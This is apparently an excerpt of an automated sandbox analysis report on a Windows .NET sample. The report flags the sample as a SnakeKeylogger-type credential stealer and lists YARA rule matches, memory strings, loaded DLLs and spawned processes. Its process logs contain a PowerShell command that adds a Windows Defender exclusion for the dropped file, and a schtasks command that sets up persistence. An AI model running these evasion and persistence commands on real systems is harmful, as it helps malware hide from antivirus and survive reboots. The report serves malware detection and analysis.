Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_085BB818	8_2_085BB818
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_085B5830	8_2_085B5830
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_085B5820	8_2_085B5820
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_085B3918	8_2_085B3918
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_085B6108	8_2_085B6108
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_085B53F8	8_2_085B53F8
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_085B3D50	8_2_085B3D50
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0118C146	12_2_0118C146
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_01185362	12_2_01185362
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0118D2C9	12_2_0118D2C9
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0118D599	12_2_0118D599
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0118C468	12_2_0118C468
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0118C738	12_2_0118C738
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_011869A0	12_2_011869A0
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0118FBE6	12_2_0118FBE6
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0118CA08	12_2_0118CA08
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0118EAA8	12_2_0118EAA8
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_01183AA1	12_2_01183AA1
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_01189DE0	12_2_01189DE0
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_01186FC8	12_2_01186FC8
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0118CFF8	12_2_0118CFF8
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_011839F0	12_2_011839F0
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_011829EC	12_2_011829EC
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0118EA9B	12_2_0118EA9B
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_01183E09	12_2_01183E09
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_06871E80	12_2_06871E80
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_068717A0	12_2_068717A0
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_06874D90	12_2_06874D90
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_06872568	12_2_06872568
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_06870B30	12_2_06870B30
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687DB68	12_2_0687DB68
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_06879090	12_2_06879090
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_06879980	12_2_06879980
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687CE51	12_2_0687CE51
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687CE60	12_2_0687CE60
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_06871E70	12_2_06871E70
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687178F	12_2_0687178F
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687DFB3	12_2_0687DFB3
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687DFC0	12_2_0687DFC0
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687D701	12_2_0687D701
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687D710	12_2_0687D710
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687ECB9	12_2_0687ECB9
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687ECC8	12_2_0687ECC8
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687E408	12_2_0687E408
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687E418	12_2_0687E418
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_06874D87	12_2_06874D87
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687F56B	12_2_0687F56B
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687F578	12_2_0687F578
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_068792B0	12_2_068792B0
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687D2B8	12_2_0687D2B8
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687CA08	12_2_0687CA08
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_06870B20	12_2_06870B20
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687DB67	12_2_0687DB67
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_06870007	12_2_06870007
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_06870040	12_2_06870040
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687E860	12_2_0687E860
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687E870	12_2_0687E870
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687F9D0	12_2_0687F9D0
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_06878908	12_2_06878908
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687F110	12_2_0687F110
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0687F120	12_2_0687F120

Source: EUYIlr7uUX.exe, 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs EUYIlr7uUX.exe
Source: EUYIlr7uUX.exe, 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs EUYIlr7uUX.exe
Source: EUYIlr7uUX.exe, 00000000.00000002.1444713566.000000000791A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs EUYIlr7uUX.exe
Source: EUYIlr7uUX.exe, 00000000.00000002.1444713566.000000000791A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShe vs EUYIlr7uUX.exe
Source: EUYIlr7uUX.exe, 00000000.00000002.1440364137.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs EUYIlr7uUX.exe
Source: EUYIlr7uUX.exe, 00000000.00000002.1438166467.000000000101E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs EUYIlr7uUX.exe
Source: EUYIlr7uUX.exe, 00000000.00000002.1444409758.0000000007260000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs EUYIlr7uUX.exe
Source: EUYIlr7uUX.exe, 00000007.00000002.3904350848.0000000005C79000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs EUYIlr7uUX.exe
Source: EUYIlr7uUX.exe	Binary or memory string: OriginalFilenameHfrS.exe@ vs EUYIlr7uUX.exe

Source: EUYIlr7uUX.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 12.2.qggKEJlcsFa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.qggKEJlcsFa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.EUYIlr7uUX.exe.3d1f790.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.EUYIlr7uUX.exe.3d1f790.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.EUYIlr7uUX.exe.3d1f790.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: EUYIlr7uUX.exe PID: 7436, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: EUYIlr7uUX.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: qggKEJlcsFa.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack, --.cs	Base64 encoded string: 'WwtTdxw6FYnrDd8znbhhkIhCmd89tshoETy6qvE5AyCo2w9PHTi1D1f1br7OJTWa'
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack, --.cs	Base64 encoded string: 'WwtTdxw6FYnrDd8znbhhkIhCmd89tshoETy6qvE5AyCo2w9PHTi1D1f1br7OJTWa'

Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, jMClKYLbW0ZwMAjgIV.cs	Security API names: _0020.SetAccessControl
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, jMClKYLbW0ZwMAjgIV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, jMClKYLbW0ZwMAjgIV.cs	Security API names: _0020.AddAccessRule
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, s5tH6CgMQIoDxk6cC6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, s5tH6CgMQIoDxk6cC6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, jMClKYLbW0ZwMAjgIV.cs	Security API names: _0020.SetAccessControl
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, jMClKYLbW0ZwMAjgIV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, jMClKYLbW0ZwMAjgIV.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@16/11@9/4

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

File created: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

File created: C:\Users\user\AppData\Local\Temp\tmp16F6.tmp

Jump to behavior

Source: EUYIlr7uUX.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: EUYIlr7uUX.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002FE9000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: EUYIlr7uUX.exe

ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

File read: C:\Users\user\Desktop\EUYIlr7uUX.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\EUYIlr7uUX.exe "C:\Users\user\Desktop\EUYIlr7uUX.exe"
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp16F6.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process created: C:\Users\user\Desktop\EUYIlr7uUX.exe "C:\Users\user\Desktop\EUYIlr7uUX.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp2369.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process created: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe"
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe"	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp16F6.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process created: C:\Users\user\Desktop\EUYIlr7uUX.exe "C:\Users\user\Desktop\EUYIlr7uUX.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp2369.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process created: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe"	Jump to behavior

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
